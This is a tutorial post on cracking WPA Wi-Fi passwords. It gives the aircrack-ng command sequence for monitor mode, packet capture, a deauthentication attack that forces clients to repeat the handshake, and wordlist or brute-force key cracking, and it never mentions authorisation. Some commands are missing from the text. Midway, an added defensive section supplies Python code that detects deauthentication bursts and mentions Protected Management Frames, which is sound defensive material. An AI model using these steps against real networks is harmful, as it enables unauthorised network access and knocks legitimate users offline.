Cracking WPA encryption

Install aircrack-ng using the Synaptic package manager on Ubuntu (or apt-get), or use MacPorts on a Mac.

Open a terminal and run…
NOTE: airmon-ng will not work on a Mac.

Note down your wlan interface number; you might need it later.

airmon-ng start wlan0 11

wlan0 is the name of the interface and 11 is the channel.
Verify that monitor mode has started by running


You can check the details using


Use the following to start airodump-ng and capture all wireless packets:

airodump-ng -c 11 -w psk mon0

UPDATE: on a Mac you can use the airport utility to create a dump and sniff packets.

You need to enable the airport command-line utility. On the Mac you can use airport -s to scan for all networks in range, and run
airport sniff "channel #"
to sniff all packets on the channel and log them. The .cap file can be found in the /tmp folder.

Get the BSSID and STATION ID from the airodump-ng output and use them with aireplay-ng to send out a disconnect (deauthentication) packet. This forces Wi-Fi devices to repeat the WPA 4-way handshake, which you can capture.

                    BSSID                STATION ID
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
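
From the defender's side, the disconnect frames sent in this step are visible to any monitor-mode sensor. The following is an added example, not code from the original post: it parses raw 802.11 management frames and flags a BSSID/station pair that sees a burst of deauthentication or disassociation frames. The window, threshold, helper names and sample frames are assumptions constructed for illustration; the two MAC addresses are the ones from the command above.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 0x0C, 0x0A  # 802.11 management-frame subtypes

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_mgmt(frame):
    """Return (subtype, dst, src, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """frames: (timestamp, raw 802.11 frame without radiotap header) tuples.
    Returns sorted (bssid, station) pairs with >= threshold frames inside `window` s."""
    recent, flagged = defaultdict(list), set()
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        _, dst, src, bssid, _ = parsed
        # Frames can flow AP->client or client->AP; key on the client address.
        key = (bssid, dst if src == bssid else src)
        recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
        if len(recent[key]) >= threshold:
            flagged.add(key)
    return sorted(flagged)

def build_frame(subtype, dst, src, bssid, reason=7):
    """Build a constructed sample frame (hypothetical helper, test data only)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([subtype << 4, 0]) + b"\x00\x00" + raw(dst) + raw(src)
            + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason))

AP, STA = "00:14:6C:7E:40:80", "00:0F:B5:FD:FB:C2"  # addresses from the command above
OTHER = "02:00:00:00:00:01"                          # constructed station
SAMPLE = [(i * 0.04, build_frame(DEAUTH, *((STA, AP) if i % 2 == 0 else (AP, STA)), AP))
          for i in range(12)]                         # constructed burst, both directions
SAMPLE += [(5.0, build_frame(DEAUTH, AP, OTHER, AP, reason=3)),   # one ordinary deauth
           (0.1, build_frame(8, "FF:FF:FF:FF:FF:FF", AP, AP))]    # beacon, ignored

if __name__ == "__main__":
    for bssid, station in detect_deauth_bursts(SAMPLE):
        print(f"deauth burst: BSSID {bssid} station {station}")
```

The threshold needs tuning per site, since clients and access points also send occasional legitimate deauthentication frames. Enabling 802.11w (Protected Management Frames) lets clients reject unauthenticated ones.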

Once you feel you have captured enough packets (10-15k), you can use aircrack-ng to crack the key:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

You can use this simple C program to create word combinations and pipe its STDOUT to aircrack-ng:

permuate -d -m 8 | aircrack-ng psk*.cap -w -

Or you can use crunch and do this:
crunch 9 9 abcdefg | aircrack-ng psk*.cap -w -

